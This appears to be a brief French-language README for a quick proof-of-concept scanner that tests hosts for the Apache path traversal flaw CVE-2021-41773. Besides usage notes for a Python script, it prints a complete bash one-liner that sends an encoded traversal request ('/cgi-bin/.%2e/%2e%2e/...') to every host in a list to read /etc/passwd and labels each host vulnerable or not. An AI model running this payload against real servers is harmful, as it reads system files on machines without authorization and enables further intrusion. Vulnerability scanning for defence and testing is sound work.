
Scanner preuve de concept qui vérifie les hôtes pour la vulnérabilité de traversée de chemin Apache CVE-2021-41773, signalant un statut vulnérable ou non vulnérable.
Preuve de concept rapide et sommaire pour vérifier si des hôtes sont vulnérables à CVE-2021-41773
python3 full.py hosts.txt
Où hosts.txt contient vos cibles :
domain.com
blah.com
192.168.1.1
Il affichera si l'hôte est vulnérable ou non vulnérable.
Version Python de la commande bash :
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
Profitez-en !